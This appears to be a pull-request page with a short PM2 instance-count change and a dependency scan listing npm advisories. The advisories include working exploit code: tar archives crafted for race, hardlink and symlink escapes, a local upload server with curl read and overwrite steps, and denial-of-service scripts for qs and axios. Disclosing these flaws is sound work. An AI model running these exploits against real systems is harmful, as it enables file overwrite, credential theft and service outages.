Modified the PM2 production startup configuration to limit cluster instances from unlimited (max) to exactly 2 instances. This change reduces the number of Node.js processes spawned in production, potentially lowering memory consumption and improving resource management. The adjustment is made in the start script within the website/package.json file.
The pull request modifies the website/package.json start script, changing the PM2 cluster mode configuration from -i max to -i 2. This alters the number of instances spawned by pm2-runtime in the production startup command from utilizing all available CPU cores to explicitly spawning 2 instances. No other npm scripts or application code are affected.
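The resulting start script would look roughly like this (the entry point and any other flags are assumptions for illustration; only the `-i` value changed from `max` to `2`):

```json
{
  "scripts": {
    "start": "pm2-runtime start ./server.js -i 2"
  }
}
```

With `-i max`, pm2-runtime forks one worker per CPU core; `-i 2` caps the cluster at two workers regardless of core count.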
Check skipped - CodeRabbit’s high-level summary is enabled.
Title check
✅ Passed
The title accurately describes the main change: modifying the PM2 cluster configuration from max instances to 2 instances, and meets the 75-character requirement.
Docstring Coverage
✅ Passed
No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:
- can observe other values produced by Math.random() in the target application, and
- can control one field of a request made using form-data
Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a field value that contains the boundary, allowing them to inject additional parameters into the request.
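To make the injection concrete, here is a minimal sketch (field names "comment" and "admin" are hypothetical) of what happens when the attacker knows the boundary: a single controlled field value smuggles in a complete extra part.

```javascript
// Assume the attacker has recovered the PRNG state and predicted this boundary:
const boundary = '--------------------------123456789012345678901234';

// The application intends to send ONE field, "comment", but the attacker
// supplies a value that embeds a boundary and a second field of their own:
const injected =
  'harmless text\r\n' +
  `--${boundary}\r\n` +
  'Content-Disposition: form-data; name="admin"\r\n\r\n' +
  'true';

// Body as a multipart serializer would emit it:
const body =
  `--${boundary}\r\n` +
  'Content-Disposition: form-data; name="comment"\r\n\r\n' +
  `${injected}\r\n` +
  `--${boundary}--\r\n`;

// A server splitting on the boundary now sees two fields, not one:
const parts = body.split(`--${boundary}`).filter(p => p && p !== '--\r\n');
console.log(parts.length); // 2: "comment" plus the injected "admin" field
```

If the boundary were unpredictable, the embedded `--boundary` line would just be inert text inside the "comment" field.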
This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.
An attacker who is able to predict the output of Math.random() can predict this boundary value and craft a payload that contains the boundary, followed by another, fully attacker-controlled field. This is roughly equivalent to an improper-escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application in order to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker, including by form-data itself: if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data (such as a user-controlled webhook), they can observe the boundary values of those requests, and thus the Math.random() outputs. A common example would be an x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend, and Math.random() is a reasonable place to get such IDs (in fact, OpenTelemetry uses Math.random() for this purpose).
Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).
Impact
For an application to be vulnerable, it must:
- Use form-data to send data, including user-controlled data, to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending them (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array).
- Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence from non-sequential values.
If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.
tar 7.4.3 (npm)
pkg:npm/tar@7.4.3
Improper Handling of Unicode Encoding
Affected range
<=7.5.3
Fixed version
7.5.4
CVSS Score
8.8
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
EPSS Score
0.015%
EPSS Percentile
3rd percentile
Description
TITLE: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS
AUTHOR: Tomás Illuminati
Details
A race condition vulnerability exists in node-tar (v7.5.3) due to incomplete handling of Unicode path collisions in the path-reservations system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, on which this has been tested), the library fails to lock colliding paths (e.g., ß and ss), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits symlink-poisoning attacks via race conditions. The library uses a PathReservations system to ensure that metadata checks and file operations for the same path are serialized, preventing race conditions where one entry might clobber another concurrently.
// node-tar/src/path-reservations.ts (lines 53-62)
reserve(paths: string[], fn: Handler) {
  paths = isWindows
    ? ['win32 parallelization disabled']
    : paths.map(p => {
        return stripTrailingSlashes(
          join(normalizeUnicode(p)), // <- THE PROBLEM FOR macOS FS
        ).toLowerCase()
      })
On macOS, the filesystem treats ß and ss as the same name, but the join(normalizeUnicode(p)) key computed above does not fold them together. For example:
bash-3.2$ printf "CONTENT_SS\n" > collision_test_ss
bash-3.2$ ls
collision_test_ss
bash-3.2$ printf "CONTENT_ESSZETT\n" > collision_test_ß
bash-3.2$ ls -la
total 8
drwxr-xr-x   3 testuser staff   96 Jan 19 01:25 .
drwxr-x---+ 82 testuser staff 2624 Jan 19 01:25 ..
-rw-r--r--   1 testuser staff   16 Jan 19 01:26 collision_test_ss
bash-3.2$
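The mismatch is visible directly in JavaScript's string APIs, which is why the lower-cased reservation keys for the two names never collide even though the filesystem entries do:

```javascript
// How node-tar derives reservation keys: lower-casing, which does NOT fold ß to ss.
const key = p => p.toLowerCase();

console.log(key('collision_ß'));    // 'collision_ß'  — one reservation key
console.log(key('collision_ss'));   // 'collision_ss' — a different key
console.log('ß'.toUpperCase());     // 'SS' — full case folding only happens on upper-casing
console.log('ß'.normalize('NFD'));  // 'ß'  — Unicode normalization leaves ß alone too
```

Because the two keys differ, PathReservations hands out two independent locks, and both entries proceed in parallel against what APFS considers a single file.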
PoC
const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();
const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({ path: 'collision_ss', mode: 0o644, size: contentA.length });
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({ path: 'collision_ß', mode: 0o644, size: contentB.length });
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding
stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
  cwd: exploitDir,
  // Ensure jobs is high enough to allow parallel processing if locks fail
  jobs: 8,
});
stream.pipe(extract);

extract.on('end', () => {
  console.log('[*] Extraction complete');
  // Check what exists
  const files = fs.readdirSync(exploitDir);
  console.log('[*] Files in exploit dir:', files);
  files.forEach(f => {
    const p = path.join(exploitDir, f);
    const stat = fs.statSync(p);
    const content = fs.readFileSync(p, 'utf8');
    console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
  });
  if (
    files.length === 1 ||
    (files.length === 2 &&
      fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)
  ) {
    console.log('[*] GOOD');
  } else {
    console.log('[-] No collision');
  }
});
Impact
This is a race condition that enables arbitrary file overwrite. It affects users and systems running node-tar on macOS (APFS/HFS+). Because node-tar's reservation keys use NFD Unicode normalization (under which ß and ss remain distinct), colliding paths are not properly serialized on filesystems that fold them together (e.g., APFS, where ß and ss resolve to the same inode). This enables an attacker to circumvent the internal parallelization locks (PathReservations) using colliding filenames within a malicious tar archive.
Remediation
Update path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en').
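A minimal sketch of that folding (the function name foldKey is hypothetical): lower-casing first and then upper-casing forces the ß→SS expansion, so both spellings collapse to the same reservation key.

```javascript
// Hypothetical key-folding helper along the lines of the suggested remediation:
// normalize, then lower-case, then upper-case, so 'ß' and 'ss' both become 'SS'.
const foldKey = p =>
  p.normalize('NFKD').toLocaleLowerCase('en').toLocaleUpperCase('en');

console.log(foldKey('collision_ß'));  // 'COLLISION_SS'
console.log(foldKey('collision_ss')); // 'COLLISION_SS' — same key, same lock
```

With matching keys, PathReservations serializes the two entries instead of running them in parallel.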
Users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data, should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this filesystem entry-name collision issue.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range
<7.5.7
Fixed version
7.5.7
CVSS Score
8.2
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
EPSS Score
0.027%
EPSS Percentile
7th percentile
Description
Summary
node-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.
Details
The vulnerability exists in lib/unpack.js. When extracting a hardlink, two functions handle the linkpath differently:
Example: An application extracts a TAR using tar.extract({ cwd: '/var/app/uploads/' }). The TAR contains entry a/b/c/d/x as a hardlink to ../../../../etc/passwd.
Security check resolves the linkpath relative to the entry's parent directory: a/b/c/d/ + ../../../../etc/passwd = etc/passwd. No ../ prefix, so it passes.
Hardlink creation resolves the linkpath relative to the extraction directory (this.cwd): /var/app/uploads/ + ../../../../etc/passwd = /etc/passwd. This escapes to the system's /etc/passwd.
The security check and hardlink creation use different starting points (entry directory a/b/c/d/ vs extraction directory /var/app/uploads/), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.
PoC
Setup
Create a new directory with these files:
poc/
├── package.json
├── secret.txt ← sensitive file (target)
├── server.js ← vulnerable server
├── create-malicious-tar.js
├── verify.js
└── uploads/ ← created automatically by server.js
└── (extracted files go here)
package.json
{ "dependencies": { "tar": "^7.5.0" } }
secret.txt (sensitive file outside uploads/)
DATABASE_PASSWORD=supersecret123
server.js (vulnerable file upload server)
const http = require('http');
const fs = require('fs');
const path = require('path');
const tar = require('tar');

const PORT = 3000;
const UPLOAD_DIR = path.join(__dirname, 'uploads');
fs.mkdirSync(UPLOAD_DIR, { recursive: true });

http.createServer((req, res) => {
  if (req.method === 'POST' && req.url === '/upload') {
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', async () => {
      fs.writeFileSync(path.join(UPLOAD_DIR, 'upload.tar'), Buffer.concat(chunks));
      await tar.extract({ file: path.join(UPLOAD_DIR, 'upload.tar'), cwd: UPLOAD_DIR });
      res.end('Extracted\n');
    });
  } else if (req.method === 'GET' && req.url === '/read') {
    // Simulates app serving extracted files (e.g., file download, static assets)
    const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
    if (fs.existsSync(targetPath)) {
      res.end(fs.readFileSync(targetPath));
    } else {
      res.end('File not found\n');
    }
  } else if (req.method === 'POST' && req.url === '/write') {
    // Simulates app writing to extracted file (e.g., config update, log append)
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', () => {
      const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
      if (fs.existsSync(targetPath)) {
        fs.writeFileSync(targetPath, Buffer.concat(chunks));
        res.end('Written\n');
      } else {
        res.end('File not found\n');
      }
    });
  } else {
    res.end('POST /upload, GET /read, or POST /write\n');
  }
}).listen(PORT, () => console.log(`http://localhost:${PORT}`));
# Setup
npm install
echo "DATABASE_PASSWORD=supersecret123" > secret.txt

# Terminal 1: Start server
node server.js

# Terminal 2: Execute attack
node create-malicious-tar.js
curl -X POST --data-binary @malicious.tar http://localhost:3000/upload

# READ ATTACK: Steal secret.txt content via the hardlink
curl http://localhost:3000/read
# Returns: DATABASE_PASSWORD=supersecret123

# WRITE ATTACK: Overwrite secret.txt through the hardlink
curl -X POST -d "PWNED" http://localhost:3000/write

# Confirm secret.txt was modified
cat secret.txt
Impact
An attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:
Immediate (Read Attack): If the application serves extracted files, the attacker can read any file readable by the process.
Conditional (Write Attack): If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.
Remote Code Execution / Server Takeover
Attack Vector | Target File | Result
SSH Access | ~/.ssh/authorized_keys | Direct shell access to server
Cron Backdoor | /etc/cron.d/*, ~/.crontab | Persistent code execution
Shell RC Files | ~/.bashrc, ~/.profile | Code execution on user login
Web App Backdoor | Application .js, .php, .py files | Immediate RCE via web requests
Systemd Services | /etc/systemd/system/*.service | Code execution on service restart
User Creation | /etc/passwd (if running as root) | Add new privileged user
Data Exfiltration & Corruption
- Overwrite arbitrary files via hardlink escape + subsequent write operations
- Read sensitive files by creating hardlinks that point outside the extraction directory
- Corrupt databases and application state
- Steal credentials from config files, .env, secrets
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets.
Details
The vulnerability exists in src/unpack.ts within the [HARDLINK] and [SYMLINK] methods.
1. Hardlink Escape (Arbitrary File Overwrite)
The extraction logic uses path.resolve(this.cwd, entry.linkpath) to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (entry.linkpath) is an absolute path, path.resolve ignores the first argument (this.cwd) entirely and returns the absolute path.
The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., /etc/passwd) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.
2. Symlink Poisoning
The extraction logic passes the user-supplied entry.linkpath directly to fs.symlink without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (../../), even when secure extraction defaults are used.
PoC
The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to /etc/passwd). It then extracts the archive using standard node-tar settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten.
const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, { recursive: true, force: true }); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (hardlink to absolute local file)
const h1 = new tar.Header({ path: 'exploit_hard', type: 'Link', size: 0, linkpath: secret })
h1.encode()

// 2. Craft malicious Symlink header (symlink to /etc/passwd)
const h2 = new tar.Header({ path: 'exploit_sym', type: 'SymbolicLink', size: 0, linkpath: targetSym })
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([h1.block, h2.block, Buffer.alloc(1024)]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({ cwd: out, file: tarFile, preservePaths: false }).then(() => {
  console.log('[*] Verifying payload...')

  // Test hardlink overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test symlink poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})
Impact
Arbitrary File Overwrite: An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.
Remote Code Execution (RCE): In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all Link and SymbolicLink tar entries from extracted packages.)
tar 6.2.1 (npm)
pkg:npm/tar@6.2.1
This package is affected by the same three advisories detailed above for tar 7.4.3 (Improper Handling of Unicode Encoding, and both Path Traversal issues); the descriptions, PoCs, and remediations are identical.
An Uncontrolled Recursion (CWE-674) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft deep ASN.1 structures that trigger unbounded recursive parsing. This leads to a Denial-of-Service (DoS) via stack exhaustion when parsing untrusted DER inputs.
Details
An ASN.1 Denial of Service (DoS) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing very deeply nested constructed TLVs, causing the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process performing the parse. This is a remote, low-cost denial of service against applications that parse untrusted ASN.1 objects.
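A sketch of the kind of input involved: building a compact DER blob of nested constructed SEQUENCEs (tag 0x30), each wrapping exactly the next TLV. The depth and helper names are illustrative; the parse itself is left as a comment since it requires an unpatched node-forge.

```javascript
// DER definite-length encoding: short form below 0x80, long form above.
function derLength(n) {
  if (n < 0x80) return Buffer.from([n]);
  const bytes = [];
  while (n > 0) { bytes.unshift(n & 0xff); n >>>= 8; }
  return Buffer.from([0x80 | bytes.length, ...bytes]);
}

const DEPTH = 100000; // illustrative nesting depth

// Content length at each nesting level, innermost (empty SEQUENCE) first:
// each level adds one tag byte plus its length bytes.
const lens = [0];
for (let i = 1; i <= DEPTH; i++) {
  const inner = lens[i - 1];
  lens.push(inner + 1 + derLength(inner).length);
}

// Emit headers outermost-first; the final header is the empty innermost SEQUENCE.
const pieces = [];
for (let i = DEPTH; i >= 1; i--) {
  pieces.push(Buffer.from([0x30]), derLength(lens[i - 1]));
}
const blob = Buffer.concat(pieces);

console.log(blob.length); // ~500 KB encodes 100,000 levels of nesting
// On unpatched node-forge, parsing recurses once per level and blows the stack:
// forge.asn1.fromDer(forge.util.createBuffer(blob)); // RangeError
```

Each level costs at most five bytes, so a blob of a few hundred kilobytes forces a recursion depth far beyond V8's default call-stack limit.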
Impact
This vulnerability enables an unauthenticated attacker to reliably crash a server or client using node-forge for TLS connections or certificate parsing.
This vulnerability impacts the asn1.fromDer function in node-forge before patched version 1.3.2.
Any downstream application using this component is impacted. These components may be leveraged by downstream applications in ways that enable full compromise of availability.
Description
An Interpretation Conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and below enables remote, unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.
Details
A critical ASN.1 validation bypass vulnerability exists in the node-forge asn1.validate function within forge/lib/asn1.js. ASN.1 is a schema language that defines data structures, like the typed record schemas used in X.509, PKCS#7, PKCS#12, etc. DER (Distinguished Encoding Rules), a strict binary encoding of ASN.1, is what cryptographic code expects when verifying signatures, and the exact bytes and structure must match the schema used to compute and verify the signature. After deserializing DER, Forge uses static ASN.1 validation schemas to locate the signed data or public key, compute digests over the exact bytes required, and feed digest and signature fields into cryptographic primitives.
This vulnerability allows a specially crafted ASN.1 object to desynchronize the validator on optional boundaries, causing a malformed optional field to be semantically reinterpreted as the subsequent mandatory structure. This manifests as logic bypasses in cryptographic algorithms and protocols with optional security features (such as PKCS#12, where MACs are treated as absent) and semantic interpretation conflicts in strict protocols (such as X.509, where fields are read as the wrong type).
Impact
This flaw allows an attacker to desynchronize the validator, allowing critical components like digital signatures or integrity checks to be skipped or validated against attacker-controlled data.
Any downstream application using these components is impacted.
These components may be leveraged by downstream applications in ways that enable full compromise of integrity, leading to potential availability and confidentiality compromises.
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
Details
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
  obj = utils.combine([], leaf); // No arrayLimit check
}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
PoC
Test 1 - Basic bypass:
npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length); // Output: 6 (should be max 5)
Test 2 - DoS demonstration:
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
Configuration:
arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Use bracket notation: a[]=value (not indexed a[0]=value)
Impact
Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario:
Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
Application parses with qs.parse(query, { arrayLimit: 100 })
qs ignores limit, parses all 100,000 elements into array
Server memory exhausted → application crashes or becomes unresponsive
Service unavailable for all users
Real-world impact:
Single malicious request can crash server
No authentication required
Easy to automate and scale
Affects any endpoint parsing query strings with bracket notation
Suggested Fix
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
  obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
    ? []
    : utils.combine([], leaf); // No arrayLimit check
}
Fixed code:
if (root === '[]' && options.parseArrays) {
  // Use currentArrayLength already calculated at line 147-151
  if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
    throw new RangeError(
      'Array limit exceeded. Only ' + options.arrayLimit + ' element' +
      (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.'
    );
  }
  // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
  if (currentArrayLength >= options.arrayLimit) {
    obj = options.plainObjects ? { __proto__: null } : {};
    obj[currentArrayLength] = leaf;
  } else {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
      ? []
      : utils.combine([], leaf);
  }
}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).
tar-fs2.1.3 (npm)
pkg:npm/tar-fs@2.1.3
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
jws4.0.0 (npm)
pkg:npm/jws@4.0.0
Improper Verification of Cryptographic Signature
Affected range
=4.0.0
Fixed version
4.0.1
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score
0.009%
EPSS Percentile
1st percentile
Description
Overview
An improper signature verification vulnerability exists when using auth0/node-jws with the HS256 algorithm under specific conditions.
Am I Affected?
You are affected by this vulnerability if you meet all of the following preconditions:
Application uses the auth0/node-jws implementation of JSON Web Signatures, versions <=3.2.2 || 4.0.0
Application uses the jws.createVerify() function for HMAC algorithms
Application uses user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines
You are NOT affected by this vulnerability if you meet any of the following preconditions:
Application uses the jws.verify() interface (note: auth0/node-jsonwebtoken users fall into this category and are therefore NOT affected by this vulnerability)
Application uses only asymmetric algorithms (e.g. RS256)
Application doesn’t use user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines
Fix
Upgrade auth0/node-jws version to version 3.2.3 or 4.0.1
Acknowledgement
Okta would like to thank Félix Charette for discovering this vulnerability.
tar-fs3.0.9 (npm)
pkg:npm/tar-fs@3.0.9
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Linkify (linkifyjs) allows XSS Targeting HTML Attributes and Manipulating User-Controlled Variables. This issue affects Linkify: from 4.3.1 before 4.3.2.
axios1.8.4 (npm)
pkg:npm/axios@1.8.4
Allocation of Resources Without Limits or Throttling
Affected range
>=1.0.0 <1.12.0
Fixed version
1.12.0
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score
0.109%
EPSS Percentile
30th percentile
Description
Summary
When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform an HTTP request. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.
Details
The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.
const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;
  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, { responseType: 'arraybuffer' });
  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});
Run with limited heap to force a crash:
node --max-old-space-size=100 poc.js
Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs, for which axios ignores maxContentLength and maxBodyLength entirely and decodes the full payload into memory on Node before streaming, enabling DoS.
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent,
  httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";
app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req, res) => res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */
app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try {
    u = new URL(String(url));
  } catch {
    return res.status(400).json({ error: "invalid url" });
  }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;
  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) {
        limiter.end();
        r.data.destroy();
      } else {
        sent += chunk.length;
        limiter.write(chunk);
      }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before) / 1024 / 1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before) / 1024 / 1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
Enforce size limits
For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.
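Until axios enforces this, a guard of this kind can live entirely in application code. A hypothetical helper (not an axios API; the 3/4 ratio is the standard base64 expansion factor, so the estimate is an upper bound before padding):

```javascript
// Pre-flight check: estimate the decoded size of a base64 data: URI and
// reject it before axios ever decodes it into memory.
function assertDataUriWithinLimit(uri, maxBytes) {
  const match = /^data:[^,]*;base64,(.*)$/s.exec(uri);
  if (!match) return; // not a base64 data: URI, nothing to check here
  const payloadLength = match[1].length;
  // 4 base64 characters decode to 3 bytes (padding makes this an upper bound)
  const decodedBytes = Math.floor((payloadLength * 3) / 4);
  if (decodedBytes > maxBytes) {
    throw new Error(
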